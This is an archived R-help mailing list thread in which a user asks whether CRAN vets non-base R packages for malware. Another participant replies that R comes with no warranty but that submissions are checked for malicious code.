I just thought maybe there is something - about the process of submitting packages or anything like that - that shows that at least some diligence is being done to ensure that a given package is not just a piece of malware from ISIS or Russia. But if you, Bert, say it's not the case, then I'll believe you. I've asked my question after I received the following email from a partner company (that is a SaS company): They are starting to work with R and we are delivering some R code to them that will run in the background. I mentioned that certain R packages have to be installed in order for the code to run and got this: "I?m also going to assume that our team will want to vet any package you request. We?re big fans of open source and leveraging 3rd party libraries but are keenly aware of the risks in ?inviting strangers into your house?." This is why I asked. So, I guess, my response should be - yes, please, go ahead and "vet" them any way you want. Thank you! On Thu, Dec 8, 2016 at 12:55 PM, Bert Gunter <bgunter.4567 at gmail.com> wrote:> 1. What does "Safe" mean??? > > 2. From the R banner on startup: > > "R is free software and comes with ABSOLUTELY NO WARRANTY." > > Don't think it could be clearer than that! > > Cheers, > Bert > > > Bert Gunter > > "The trouble with having an open mind is that people keep coming along > and sticking things into it." > -- Opus (aka Berkeley Breathed in his "Bloom County" comic strip ) > > > On Thu, Dec 8, 2016 at 9:47 AM, Dimitri Liakhovitski > <dimitri.liakhovitski at gmail.com> wrote: >> Guys, >> >> suddenly, I am being asked for a proof that R packages that are not >> '"base" are safe. I've never been asked this question before. >> >> Is there some documentation on CRAN that discusses how it's ensured >> that all "official" R packages have been "vetted" and are safe? >> >> Thanks a lot! >> >> -- >> Dimitri Liakhovitski >> >> ______________________________________________ >> R-help at r-project.org mailing list -- To UNSUBSCRIBE and more, see >> https://stat.ethz.ch/mailman/listinfo/r-help >> PLEASE do read the posting guide http://www.R-project.org/posting-guide.html >> and provide commented, minimal, self-contained, reproducible code.-- Dimitri Liakhovitski
Dimitri: On Thu, Dec 8, 2016 at 10:05 AM, Dimitri Liakhovitski <dimitri.liakhovitski at gmail.com> wrote:> I just thought maybe there is something - about the process of > submitting packages or anything like that - that shows that at least > some diligence is being done to ensure that a given package is not > just a piece of malware from ISIS or Russia. > But if you, Bert, say it's not the case, then I'll believe you.** I DID NOT SAY THAT *** You asked for **guarantees." R has none. But of course U. Wien checks R packages on submission for malicious code (it is one reason binary submissions are generally not permitted) and R repository servers of course have filters in place. BUT THERE ARE NO GUARANTEES, explicit or implied. Cheers, Bert> > I've asked my question after I received the following email from a > partner company (that is a SaS company): > They are starting to work with R and we are delivering some R code to > them that will run in the background. I mentioned that certain R > packages have to be installed in order for the code to run and got > this: > > "I?m also going to assume that our team will want to vet any package > you request. We?re big fans of open source and leveraging 3rd party > libraries but are keenly aware of the risks in ?inviting strangers > into your house?." > > This is why I asked. > So, I guess, my response should be - yes, please, go ahead and "vet" > them any way you want. > Thank you! > > On Thu, Dec 8, 2016 at 12:55 PM, Bert Gunter <bgunter.4567 at gmail.com> wrote: >> 1. What does "Safe" mean??? >> >> 2. From the R banner on startup: >> >> "R is free software and comes with ABSOLUTELY NO WARRANTY." >> >> Don't think it could be clearer than that! >> >> Cheers, >> Bert >> >> >> Bert Gunter >> >> "The trouble with having an open mind is that people keep coming along >> and sticking things into it." >> -- Opus (aka Berkeley Breathed in his "Bloom County" comic strip ) >> >> >> On Thu, Dec 8, 2016 at 9:47 AM, Dimitri Liakhovitski >> <dimitri.liakhovitski at gmail.com> wrote: >>> Guys, >>> >>> suddenly, I am being asked for a proof that R packages that are not >>> '"base" are safe. I've never been asked this question before. >>> >>> Is there some documentation on CRAN that discusses how it's ensured >>> that all "official" R packages have been "vetted" and are safe? >>> >>> Thanks a lot! >>> >>> -- >>> Dimitri Liakhovitski >>> >>> ______________________________________________ >>> R-help at r-project.org mailing list -- To UNSUBSCRIBE and more, see >>> https://stat.ethz.ch/mailman/listinfo/r-help >>> PLEASE do read the posting guide http://www.R-project.org/posting-guide.html >>> and provide commented, minimal, self-contained, reproducible code. > > > > -- > Dimitri Liakhovitski
Great to know thanks, Bert! Do you happen to have a reference that shows that: -U. Wien checks R packages on submission for malicious code -R repository servers have filters in place. Thanks again! On Thu, Dec 8, 2016 at 1:13 PM, Bert Gunter <bgunter.4567 at gmail.com> wrote:> Dimitri: > > > > > On Thu, Dec 8, 2016 at 10:05 AM, Dimitri Liakhovitski > <dimitri.liakhovitski at gmail.com> wrote: >> I just thought maybe there is something - about the process of >> submitting packages or anything like that - that shows that at least >> some diligence is being done to ensure that a given package is not >> just a piece of malware from ISIS or Russia. >> But if you, Bert, say it's not the case, then I'll believe you. > > ** I DID NOT SAY THAT *** > > You asked for **guarantees." R has none. But of course U. Wien checks > R packages on submission for malicious code (it is one reason binary > submissions are generally not permitted) and R repository servers of > course have filters in place. BUT THERE ARE NO GUARANTEES, explicit or > implied. > > Cheers, > Bert > > > >> >> I've asked my question after I received the following email from a >> partner company (that is a SaS company): >> They are starting to work with R and we are delivering some R code to >> them that will run in the background. I mentioned that certain R >> packages have to be installed in order for the code to run and got >> this: >> >> "I?m also going to assume that our team will want to vet any package >> you request. We?re big fans of open source and leveraging 3rd party >> libraries but are keenly aware of the risks in ?inviting strangers >> into your house?." >> >> This is why I asked. >> So, I guess, my response should be - yes, please, go ahead and "vet" >> them any way you want. >> Thank you! >> >> On Thu, Dec 8, 2016 at 12:55 PM, Bert Gunter <bgunter.4567 at gmail.com> wrote: >>> 1. What does "Safe" mean??? >>> >>> 2. From the R banner on startup: >>> >>> "R is free software and comes with ABSOLUTELY NO WARRANTY." >>> >>> Don't think it could be clearer than that! >>> >>> Cheers, >>> Bert >>> >>> >>> Bert Gunter >>> >>> "The trouble with having an open mind is that people keep coming along >>> and sticking things into it." >>> -- Opus (aka Berkeley Breathed in his "Bloom County" comic strip ) >>> >>> >>> On Thu, Dec 8, 2016 at 9:47 AM, Dimitri Liakhovitski >>> <dimitri.liakhovitski at gmail.com> wrote: >>>> Guys, >>>> >>>> suddenly, I am being asked for a proof that R packages that are not >>>> '"base" are safe. I've never been asked this question before. >>>> >>>> Is there some documentation on CRAN that discusses how it's ensured >>>> that all "official" R packages have been "vetted" and are safe? >>>> >>>> Thanks a lot! >>>> >>>> -- >>>> Dimitri Liakhovitski >>>> >>>> ______________________________________________ >>>> R-help at r-project.org mailing list -- To UNSUBSCRIBE and more, see >>>> https://stat.ethz.ch/mailman/listinfo/r-help >>>> PLEASE do read the posting guide http://www.R-project.org/posting-guide.html >>>> and provide commented, minimal, self-contained, reproducible code. >> >> >> >> -- >> Dimitri Liakhovitski-- Dimitri Liakhovitski